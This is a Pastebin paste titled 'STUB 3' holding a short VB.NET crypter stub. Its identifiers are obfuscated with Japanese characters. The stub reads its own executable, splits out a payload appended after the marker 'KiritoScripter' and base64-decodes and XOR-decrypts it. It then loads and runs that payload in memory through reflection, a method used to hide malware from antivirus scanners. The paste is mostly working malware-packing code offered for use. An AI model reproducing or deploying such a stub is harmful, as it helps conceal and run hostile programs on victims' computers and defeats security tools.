Advertisement
guvioli

STUB 3

Dec 9th, 2019
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. Module 任ェた愛愛
  2. Const 愛たのす合 = "KiritoScripter"
  3. Dim のェつつべ() As String = Split(IO.File.ReadAllText(Reflection.Assembly.GetExecutingAssembly.Location), 愛たのす合)
  4. Dim 合がはのが As Byte()
  5. Public xorkeyy As String = のェつつべ(2)
  6. Sub Main()
  7. 合がはのが = Xor_Decrypt(Convert.FromBase64String((のェつつべ(1))))
  8. Dim 任で愛べべ As Object = Reflection.Assembly.Load(合がはのが).EntryPoint.Invoke(Nothing, Nothing)
  9. End Sub
  10. Public Function Xor_Decrypt(ByVal っののべす As Byte()) As Byte()
  11. Dim て私べっの As Byte() = System.Text.Encoding.ASCII.GetBytes(xorkeyy)
  12. Dim すスつちは As Integer = っののべす(っののべす.Length - 1) Xor 112
  13. Dim つはちたっ(っののべす.Length) As Byte
  14. Dim つっでチち As Integer
  15. For 任ェた愛愛0 As Integer = 0 To っののべす.Length - 1
  16. つはちたっ(任ェた愛愛0) = (っののべす(任ェた愛愛0) Xor すスつちは) Xor て私べっの(つっでチち)
  17. If つっでチち = xorkeyy.Length - 1 Then つっでチち = 0 Else つっでチち = つっでチち + 1
  18. Next
  19. ReDim Preserve つはちたっ(っののべす.Length - 2)
  20. Return つはちたっ
  21. End Function
  22. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement